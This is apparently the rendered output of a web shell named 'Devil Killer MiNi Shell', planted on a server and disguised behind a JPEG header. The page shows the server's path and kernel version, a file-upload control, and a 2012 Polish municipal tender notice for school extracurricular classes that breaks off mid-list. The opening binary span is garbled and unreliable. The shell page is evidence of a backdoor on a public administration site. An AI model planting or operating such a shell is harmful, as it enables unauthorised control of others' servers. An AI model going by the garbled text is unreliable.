JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121019/409148-N-2012.html

<p class="kh_header"><b>Olszówka: Zajęcia edukacyjne przy realizacji projektu Szkoła z pasją</b><br>
<b>Numer ogłoszenia: 409148 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olszówka , Olszówka 15, 62-641 Olszówka, woj. wielkopolskie, tel. 063 2739010, faks 063 2739030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olszowka.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zajęcia edukacyjne przy realizacji projektu Szkoła z pasją.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie zajęć pozalekcyjnych dla uczniów klas IV-VI  Szkół Podstawowych w Głębokiem, Łubiance, Ponętowie Górnym Drugim i klas I-III Gimnazjum w Łubiance w ramach projektu Szkoła z pasją współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
Celem projektu Szkoła z pasją jest trwałe podniesienie jakości kształcenia oraz kompleksowe wyrównanie szans edukacyjnych 200 uczniów z 3 szkół podstawowych i 1 gimnazjum na terenie Gminy Olszówka poprzez zagwarantowanie im udziału w nadprogramowych zajęciach dydaktyczno-wyrównawczych i rozwojowych.
Przedmiot zapytania został podzielony na części i grupy, w związku z czym Zamawiający dopuszcza składanie ofert częściowych na niżej wymienione części:
CZEŚĆ 1. Prowadzenie zajęć dydaktyczno-wyrównawczych z języka polskiego dla dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 2. Prowadzenie zajęć dydaktyczno-wyrównawczych z języka polskiego dla dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (8-osobowej) przez 28 tygodni w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 3. Prowadzenie zajęć dydaktyczno-wyrównawczych z języka polskiego dla dzieci klas IV-VI Szkół Podstawowych w Ponętowie Górnym Drugim 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (8-osobowej) przez 28 tygodni w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 4. Prowadzenie zajęć dydaktyczno-wyrównawczych z języka polskiego dla dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 5. Prowadzenie zajęć dydaktyczno-wyrównawczych z matematyki dla dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 6. Prowadzenie zajęć dydaktyczno-wyrównawczych z matematyki dla dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 7. Prowadzenie zajęć dydaktyczno-wyrównawczych z matematyki dla dzieci klas IV-VI Szkół Podstawowych  w Ponętowie Górnym Drugim 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 8. Prowadzenie zajęć dydaktyczno-wyrównawczych z matematyki dla dzieci klas I-III Gimnazjum w Łubiance dla grupy I
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (9-osobowej) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 9. Prowadzenie zajęć dydaktyczno-wyrównawczych z matematyki dla dzieci klas I-III Gimnazjum w Łubiance dla grupy II
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (9-osobowej) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZĘŚĆ 10. Prowadzenie zajęć dydaktyczno-wyrównawczych z chemii dla dzieci klas I-III Gimnazjum w Łubiance 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 2 grupach (9-osobowych) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 11. Prowadzenie zajęć rozwojowych z informatyki dla dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 2 grupach (7-osobowych) przez 28 tygodni w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 12. Prowadzenie zajęć rozwojowych z informatyki dla dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 2 grupach (10-osobowych) przez 28 tygodni w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 13. Prowadzenie zajęć rozwojowych z informatyki dla dzieci klas IV-VI Szkół Podstawowych  w Ponętowie Górnym Drugim 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 14. Prowadzenie zajęć rozwojowych z informatyki dla dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 2 grupach (10-osobowych) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 15. Prowadzenie zajęć rozwojowych z matematyki dla dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 16. Prowadzenie zajęć rozwojowych z matematyki dla dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 17. Prowadzenie zajęć rozwojowych z matematyki dla dzieci klas IV-VI Szkół Podstawowych  w Ponętowie Górnym Drugim
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 18. Prowadzenie zajęć rozwojowych z matematyki dla dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 19. Prowadzenie zajęć rozwojowych z przedsiębiorczości dla dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzi
CZEŚĆ 20. Prowadzenie zajęć rozwojowych z przedsiębiorczości dla dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 21. Prowadzenie zajęć rozwojowych z przedsiębiorczości dla dzieci klas IV-VI Szkół Podstawowych  w Ponętowie Górnym Drugim 
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 22. Prowadzenie zajęć rozwojowych z przedsiębiorczości dla dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie tygodniowo 1 godziny lekcyjnej  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 28 godzin
CZEŚĆ 23. Prowadzenie koła rozwijającego zainteresowania ze szczególnym uwzględnieniem nauk geograficznych i biologicznych dla dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 24. Prowadzenie koła rozwijającego zainteresowania ze szczególnym uwzględnieniem nauk geograficznych i biologicznych dla dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 25. Prowadzenie koła rozwijającego zainteresowania ze szczególnym uwzględnieniem nauk geograficznych i biologicznych dla dzieci klas IV-VI Szkół Podstawowych  w Ponętowie Górnym Drugim 
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 26. Prowadzenie koła rozwijającego zainteresowania ze szczególnym uwzględnieniem nauk geograficznych i biologicznych dla dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 2 grupach (10-osobowych) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 112 godzin
CZEŚĆ 27. Prowadzenie zajęć językowych z języka angielskiego z wykorzystaniem przez nauczycieli technik ICT dla dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 28. Prowadzenie zajęć językowych z języka angielskiego z wykorzystaniem przez nauczycieli technik ICT dla dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 29. Prowadzenie zajęć językowych z języka angielskiego z wykorzystaniem przez nauczycieli technik ICT dla dzieci klas IV-VI Szkół Podstawowych  w Ponętowie Górnym Drugim 
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 30. Prowadzenie zajęć językowych z języka angielskiego z wykorzystaniem przez nauczycieli technik ICT dla dzieci klas I-III Gimnazjum w Łubiance w 2 grupach
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 2 grupach (10-osobowych) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 112 godzin
CZEŚĆ 31. Prowadzenie zajęć językowych z języka angielskiego z wykorzystaniem przez nauczycieli technik ICT dla dzieci klas I-III Gimnazjum w Łubiance w 1 grupie
Przeprowadzenie tygodniowo 2 godzin lekcyjnych  (po 45 min) w 1 grupie (10-osobowej) przez 28 tygodni w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 56 godzin
CZEŚĆ 32. Prowadzenie zajęć logopedycznych w celu korygowania wad wymowy u dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie 12 godzin (po 60 min) dla 10 osób (12h/1os.) w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 120 godzin
CZEŚĆ 33. Prowadzenie zajęć logopedycznych w celu korygowania wad wymowy u dzieci klas IV-VI Szkół Podstawowych  w Łubiance
Przeprowadzenie 12 godzin (po 60 min) dla 6 osób (12h/1os.)  w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 72 godziny
CZEŚĆ 34. Prowadzenie zajęć logopedycznych w celu korygowania wad wymowy u dzieci klas IV-VI Szkół Podstawowych  w Ponętowie Górnym Drugim
Przeprowadzenie 12 godzin (po 60 min) dla 5 osób (12h/1os.) w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 60 godzin
CZEŚĆ 35. Prowadzenie poradnictwa pedagogicznego w ramach wczesnego wspomagania rozwoju dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie 12 godzin (po 60 min) dla 10 osób (12h/1os.) w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 120 godzin
CZEŚĆ 36. Prowadzenie poradnictwa pedagogicznego w ramach wczesnego wspomagania rozwoju dzieci klas IV-VI Szkół Podstawowych w Łubiance
Przeprowadzenie 12 godzin (po 60 min) dla 6 osób (12h/1os.)  w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 72 godziny
CZEŚĆ 37. Prowadzenie poradnictwa pedagogicznego w ramach wczesnego wspomagania rozwoju dzieci klas IV-VI Szkół Podstawowych w Ponętowie Górnym Drugim
Przeprowadzenie 12 godzin (po 60 min) dla 6 osób (12h/1os.) w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 72 godzin
CZEŚĆ 38. Prowadzenie poradnictwa pedagogicznego w ramach wczesnego wspomagania rozwoju dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie 12 godzin (po 60 min) dla 10 osób (12h/1os.) w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 120 godzin
CZEŚĆ 39. Prowadzenie poradnictwa psychologicznego w ramach wczesnego wspomagania rozwoju dzieci klas IV-VI Szkół Podstawowych  w Głębokiem
Przeprowadzenie 12 godzin (po 60 min) dla 10 osób (12h/1os.) w Szkole Podstawowej w Głębokiem, prowadzenie kart obserwacji, dzienników zajęć - łącznie 120 godzin
CZEŚĆ 40. Prowadzenie poradnictwa psychologicznego w ramach wczesnego wspomagania rozwoju dzieci klas IV-VI Szkół Podstawowych  w Łubiance 
Przeprowadzenie 12 godzin (po 60 min) dla 8 osób (12h/1os.)  w Szkole Podstawowej w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 96 godziny
CZEŚĆ 41. Prowadzenie poradnictwa psychologicznego w ramach wczesnego wspomagania rozwoju dzieci klas IV-VI Szkół Podstawowych w Ponętowie Górnym Drugim 
Przeprowadzenie 12 godzin (po 60 min) dla 10 osób (12h/1os.) w Szkole Podstawowej w Ponętowie Górnym Drugim, prowadzenie kart obserwacji, dzienników zajęć - łącznie 120 godzin
CZEŚĆ 42. Prowadzenie poradnictwa psychologicznego w ramach wczesnego wspomagania rozwoju dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie 12 godzin (po 60 min) dla 12 osób (12h/1os.) w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 144 godziny
CZEŚĆ 43. Prowadzenie doradztwa edukacyjno-zawodowego w formie zajęć grupowych w ramach utworzenia Szkolnego Ośrodka Kariery dla dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie zajęć grupowych - 8 spotkań po 2 godziny dla 4 grup (14 lub 15-osobowych) w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 64 godziny
CZEŚĆ 44. Prowadzenie doradztwa edukacyjno-zawodowego w formie zajęć indywidualnych w ramach utworzenia Szkolnego Ośrodka Kariery dla dzieci klas I-III Gimnazjum w Łubiance
Przeprowadzenie zajęć indywidualnych dla 57 osób po 4h/1os. w Gimnazjum w Łubiance, prowadzenie kart obserwacji, dzienników zajęć - łącznie 228 godzin.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 44.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na zasadzie spełnia/nie spełnia, na podstawie złożonego w ofercie dokumentu tj. wykazu usług, z którego wynikać będzie, że Wykonawca wykonał  minimum 1 usługę o charakterze podobnym rodzajowo do przedmiotu zamówienia w ramach Programu Operacyjnego Kapitał Ludzki; powyższy wykaz musi być potwierdzony referencjami (nie dotyczy osób fizycznych nie prowadzących działalności gospodarczej)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca winien wykazać się, że dysponuje osobą lub zdolnymi do wykonania zamówienia (w zależności od oferowanej części), posiadającymi: 
a) następujące wykształcenie: wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające kwalifikacje do nauczania języka polskiego - dotyczy części: 1-4; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające kwalifikacje do nauczania matematyki - dotyczy części: 5-9, 15-18; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające  kwalifikacje do nauczania chemii - dotyczy części: 10; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające kwalifikacje do nauczania informatyki - dotyczy części: 11-14; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające kwalifikacje do nauczania przedsiębiorczości - dotyczy części: 19-22; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające kwalifikacje do nauczania przyrody lub biologii lub geografii - dotyczy części: 23-26; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające kwalifikacje do nauczania języka angielskiego - dotyczy części: 27-31; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii - dotyczy części: 32-34; wykształcenie wyższe magisterskie na kierunku pedagogika w zakresie pracy opiekuńczej i socjalno-wychowawczej - dotyczy części 35-38; wykształcenie wyższe magisterskie w zakresie psychologii z przygotowaniem pedagogicznym - dotyczy części: 39-42; wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dające kwalifikacje do prowadzenia zajęć doradztwa zawodowego - dotyczy części: 43-44;
b) doświadczenie zgodne z posiadanym wykształceniem, minimum 3-letnie doświadczenie w prowadzeniu zajęć szkolnych (dla nauczycieli), natomiast dla zajęć specjalistycznych minimum 2-letnie doświadczenie.
Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia oraz kserokopie dokumentów potwierdzających wykształcenie i staż pracy. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia nie spełnia, na podstawie dokumentów i oświadczeń załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
